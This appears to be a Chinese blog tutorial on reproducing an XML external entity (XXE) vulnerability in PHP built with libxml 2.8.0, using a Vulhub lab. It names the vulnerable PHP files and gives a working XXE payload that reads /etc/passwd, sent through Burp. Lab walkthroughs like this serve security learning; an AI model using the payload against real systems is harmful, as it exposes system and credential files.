PHP环境 XML外部实体注入漏洞(XXE)
发布于 2021-05-12 23:22 ,所属分类:区块连和PHP开发学习资料
点击进入“php从入门到精通”
领取免费资料
利用vulhub搭建环境(Vulhub是一个面向大众的开源漏洞靶场)
漏洞版本:
- PHP 7.0.30
- libxml 2.8.0
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
编译并启动环境

访问 http://xxx.xxx.xxx.xxx:8080进入主页看到phpinfo,查看libxml版本是否为2.9.0以下。

目录下有dom.php、index.php、SimpleXMLElement.php、simplexml_load_string.php其中dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞。

XXE payload
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>
burp抓包进行更改







![[Linux] 传智播客PHP+MySQL+LAMP环境搭建2015-Linux视频教程 48集完整版本](https://static.kouhao8.com/sucaidashi/xkbb/81c9d8d340b5e619b2afe7f96da61b4d.jpg?x-oss-process=image/format,webp/resize,w_88/crop,w_88,h_88,g_nw)
























相关资源